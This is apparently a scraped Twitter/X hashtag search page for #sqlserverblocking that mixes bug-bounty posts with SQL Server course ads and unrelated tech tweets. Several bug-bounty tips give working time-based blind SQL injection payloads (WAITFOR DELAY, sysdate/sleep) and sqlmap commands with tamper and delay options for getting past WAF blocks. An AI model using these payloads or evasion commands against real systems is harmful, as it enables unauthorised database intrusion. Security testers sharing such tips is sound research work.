#sqlserverblocking ผลการค้นหา

Blind sql injection payload used > '%3bWAITFOR+DELAY+'00%3a00%3a5'-- Microsoft sql server

Gotcha1G's tweet image. Blind sql injection payload used > '%3bWAITFOR+DELAY+'00%3a00%3a5'--
Microsoft sql server

How to bypass Cloudflare WAF? @FearsOff #bugbountytips #cloudflare #waf #bypass 1. Found an SQL injection but getting blocked by Cloudflare? Here's a pro tip 😏

k_firsov's tweet image. How to bypass Cloudflare WAF?
@FearsOff #bugbountytips #cloudflare #waf #bypass

1. Found an SQL injection but getting blocked by Cloudflare?
Here's a pro tip 😏

[New YouTube Shorts Alert] TSQL Anti-Pattern Implicit Conversion More Shorts here: bit.ly/SQLServerShorts Share/RT. #SQLServer #SQL #TSQL #AzureSQL #SQLServerWithAmitBansal


[New YouTube Shorts Alert] TSQL Anti-Pattern Implicit Conversion More Shorts here: bit.ly/SQLServerShorts Share/RT. #SQLServer #SQL #TSQL #AzureSQL cc @SQLMaestros #SQLServerWithAmitBansal


Another day, another #SQLInjection. This time, it's in the User-Agent header, leading a full database takeover. Keep testing SQLi on everything and everywhere... #SQL #SQLinjection #BugBounty.

nav1n0x's tweet image. Another day, another #SQLInjection. This time, it's in the User-Agent  header, leading a full database takeover. Keep testing SQLi on  everything and everywhere... #SQL #SQLinjection #BugBounty.

[New YouTube Shorts Alert] TSQL Anti-Pattern Implicit Conversion More Shorts here: bit.ly/SQLServerShorts Share/RT. #SQLServer #SQL #TSQL #AzureSQL #SQLServerWithAmitBansal


Found an SQLi using sysdate() based blind SQLi payload: 0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z #SqlInjection #SQLi #bugbountytips #BugBounty

nav1n0x's tweet image. Found an SQLi using sysdate() based blind SQLi payload: 

0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z

#SqlInjection #SQLi #bugbountytips  #BugBounty

[New YouTube Shorts Alert] TSQL Anti-Pattern Implicit Conversion More Shorts here: bit.ly/SQLServerShorts Share/RT. #SQLServer #SQL #TSQL #AzureSQL #SQLServerWithAmitBansal


Found a strange SQL injection point in the "x-requested-with:" header using the payload "1 waitfor delay '0:0:5' --". However anything below 3 milli delay had no affect on the server and more than 10 milli delay was crashing the server and giving 503. #bugbountytips #BugBounty

nav1n0x's tweet image. Found a strange SQL injection point in the "x-requested-with:" header using the payload "1 waitfor delay '0:0:5' --". However anything below 3 milli delay had no affect on the server and more than 10 milli delay was crashing the server and giving  503. #bugbountytips #BugBounty

Blind sql injection payload used >'%3bWAITFOR+DELAY+'00%3a00%3a5'-- Microsoft sql server credit: @Gotcha1G #bugbountytips #BugBounty

RootMoksha's tweet image. Blind sql injection payload used 

>'%3bWAITFOR+DELAY+'00%3a00%3a5'--

Microsoft sql server

credit: @Gotcha1G 

#bugbountytips #BugBounty

new day, new goal 🔥 If you find sql injection and encounter a 403 or waf block, be sure to try tamper scripts and update your sqlmap 🌹🌹🔥🥳🥳 Payload ; sqlmap -r req.txt --risk 3 --level 3 --dbs --tamper=space2comment,space2morehash #BugBounty #BugBountyTips @intigriti

ynsmroztas's tweet image. new day, new goal 🔥

If you find sql injection and encounter a 403 or waf block, be sure to try tamper scripts and update your sqlmap 🌹🌹🔥🥳🥳
Payload ; 

sqlmap -r req.txt --risk 3 --level 3 --dbs --tamper=space2comment,space2morehash

#BugBounty #BugBountyTips 
@intigriti

Blind sql injection payload used >'%3bWAITFOR+DELAY+'00%3a00%3a5'-- Microsoft sql server credit: @Gotcha1G #bugbountytips #BugBounty

WllGates's tweet image. Blind sql injection payload used 

>'%3bWAITFOR+DELAY+'00%3a00%3a5'--

Microsoft sql server

credit: @Gotcha1G 

#bugbountytips #BugBounty

Sorry for the downtime on Screener yesterday. While doing some clean-up, I ran a DELETE query on database to delete ~60 million rows. This saturated the disk-IO for 8+ hours 😱. I never knew that a DELETE query can stall the database 🙈. Details → fully-faltoo.com/p/mysql-delete/

faltoo's tweet image. Sorry for the downtime on Screener yesterday.

While doing some clean-up, I ran a DELETE query on database to delete ~60 million rows. This saturated the disk-IO for 8+ hours 😱.

I never knew that a DELETE query can stall the database 🙈.

Details → fully-faltoo.com/p/mysql-delete/

Blocking Microsoft activation servers with a firewall (*.mp.microsoft.com, *.sls.microsoft.com) disables Microsoft Store

endermanch's tweet image. Blocking Microsoft activation servers with a firewall (*.mp.microsoft.com, *.sls.microsoft.com) disables Microsoft Store

If you found a syntax error but are stuck with server delay and waf block, be sure to use --delay (with Tor or VPN) so you can solve the problem 🥳🤗 sqlmap -u 'https :// domain[.]X/blablabla.php?kID=1%27' -p parameter --dbs --delay=3 @intigriti #bugbountytips #bugbounty

ynsmroztas's tweet image. If you found a syntax error but are stuck with server delay and waf block, be sure to use --delay (with Tor or VPN) so you can solve the problem 🥳🤗

sqlmap -u 'https :// domain[.]X/blablabla.php?kID=1%27' -p parameter --dbs --delay=3

@intigriti 
#bugbountytips #bugbounty

Read the linked article. It is a straight forward requirement to remove Oracle/MS Sql server and make it sanction proof. Also add some security compliances. They are also building service companies to migrate, deploy, maintain this in RBI and SEBI linked institutions.

JackRangaswami's tweet image. Read the linked article. It is a straight forward requirement to remove Oracle/MS Sql server and make it sanction proof. Also add some security compliances. They are also building service companies to migrate, deploy, maintain this in RBI and SEBI linked institutions.

Day 13 of breaking down system design components (from Designing Data-Intensive Applications book)🐗 Ch 7 Transactions (Part 2): Race Conditions 🏎️ When transactions run at once, things break Let’s break down the main types of race conditions that haunt databases (A 🧵[0/7])

tusharamasingh's tweet image. Day 13 of breaking down system design components
(from Designing Data-Intensive Applications book)🐗

Ch 7 Transactions (Part 2): Race Conditions 🏎️
When transactions run at once, things break

Let’s break down the main types of race conditions that haunt databases 
(A 🧵[0/7])

#Starknet Launches ‘Grinta’ Upgrade on Mainnet! @Starknet has officially deployed its v0.14.0 release, called Grinta, which lays the foundation for full decentralization, sustainable economics and smoother user interactions across the ecosystem. Key highlights of the upgrade:…


Found a strange blind time based SQLi yesterday. The target is running on Symfony & AEM, and found to be vulnerable to boolean sqli. The server delays the response but strangely increases x10 for any payloads. What do you guys think?, SQLi or... #bugbountytips 1/2

nav1n0x's tweet image. Found a strange blind time based SQLi yesterday. The target is running on Symfony & AEM, and found to be vulnerable to boolean sqli. The server delays the response but strangely increases x10 for any payloads. What do you guys think?, SQLi or... #bugbountytips 

1/2
nav1n0x's tweet image. Found a strange blind time based SQLi yesterday. The target is running on Symfony & AEM, and found to be vulnerable to boolean sqli. The server delays the response but strangely increases x10 for any payloads. What do you guys think?, SQLi or... #bugbountytips 

1/2
nav1n0x's tweet image. Found a strange blind time based SQLi yesterday. The target is running on Symfony & AEM, and found to be vulnerable to boolean sqli. The server delays the response but strangely increases x10 for any payloads. What do you guys think?, SQLi or... #bugbountytips 

1/2

Tricky ASP blind SQL Injection in a login page. Confirmed using Blind-boolean method,but it took me hours before I found the right payload - that need to be encoded. Sadly, not triaged yet Payload: `';%20waitfor%20delay%20'0:0:6'%20--%20` #BugBounty #bugbountytips #SQLinjection

nav1n0x's tweet image. Tricky ASP blind SQL Injection in a login page. Confirmed using Blind-boolean method,but it took me hours before I found the right payload - that need to be encoded. Sadly, not triaged yet

Payload: `';%20waitfor%20delay%20'0:0:6'%20--%20`

#BugBounty #bugbountytips #SQLinjection

Get monitoring scripts with set up instructions to track blocking queries and alert you for #SQLServer. #SQLServerblocking stedman.us/blockingCourse


Get monitoring scripts with set up instructions to track blocking queries and alert you for #SQLServer. #SQLServerblocking stedman.us/blockingCourse


Get monitoring scripts with set up instructions to track blocking queries and alert you for #SQLServer. #SQLServerblocking stedman.us/blockingCourse


Email alerting to avoid unresponsive or crashing server. Set up alerting for less this month! 25% off Track Blocking Queries course and script. #blockinginSQL #SQLServerblocking #SQLblocking #SQLserver stevestedman.com/block_class


A script and instructions to set up Email Alerting when Blocking occurs in SQL Server. 25% off this package in March. stevestedman.com/block_class #SQLserverblocking #SQLserver #StedmanSolutions

SqlEmt's tweet image. A script and instructions to set up Email Alerting when Blocking occurs in SQL Server. 

25% off this package in March.
stevestedman.com/block_class

#SQLserverblocking 
#SQLserver
#StedmanSolutions

Don’t let blocking in SQL hold up your server! Set up alerting so you can tackle it before it tackles your server! #blockinginSQL #SQLServerblocking #SQLblocking #SQLserver #StedmanSolutions stevestedman.com/block_class


Get a script and set up instructions to track blocking in SQL server. 25% off this month! #blockinginSQLserver #stedmansolutions #SQLserverblocking #sqlserver stevestedman.com/block_class

SqlEmt's tweet image. Get a script and set up instructions to track blocking in SQL server. 

25% off this month!
#blockinginSQLserver #stedmansolutions #SQLserverblocking #sqlserver 
stevestedman.com/block_class

When you set up alerts for SQL blocking you cut your stress in half! Our online instructions guide you through the set up – AND on SALE this month! #blockinginSQL #SQLServerblocking #SQLblocking #SQLserver #StedmanSolutions stevestedman.com/block_class


Save the stress for another day! Set up alerting when blocking in SQL Server happens! Easy as pie with our course, on SALE now thru the end of the month. #blockinginSQL #SQLServerblocking #SQLblocking #SQLserver #StedmanSolutions stevestedman.com/JuFTq


ไม่พบผลลัพธ์สำหรับ "#sqlserverblocking"

Get a script and set up instructions to track blocking in SQL server. 25% off this month! #blockinginSQLserver #stedmansolutions #SQLserverblocking #sqlserver stevestedman.com/block_class

SqlEmt's tweet image. Get a script and set up instructions to track blocking in SQL server. 

25% off this month!
#blockinginSQLserver #stedmansolutions #SQLserverblocking #sqlserver 
stevestedman.com/block_class

A script and instructions to set up Email Alerting when Blocking occurs in SQL Server. 25% off this package in March. stevestedman.com/block_class #SQLserverblocking #SQLserver #StedmanSolutions

SqlEmt's tweet image. A script and instructions to set up Email Alerting when Blocking occurs in SQL Server. 

25% off this package in March.
stevestedman.com/block_class

#SQLserverblocking 
#SQLserver
#StedmanSolutions

Loading...

Something went wrong.


Something went wrong.


United States Trends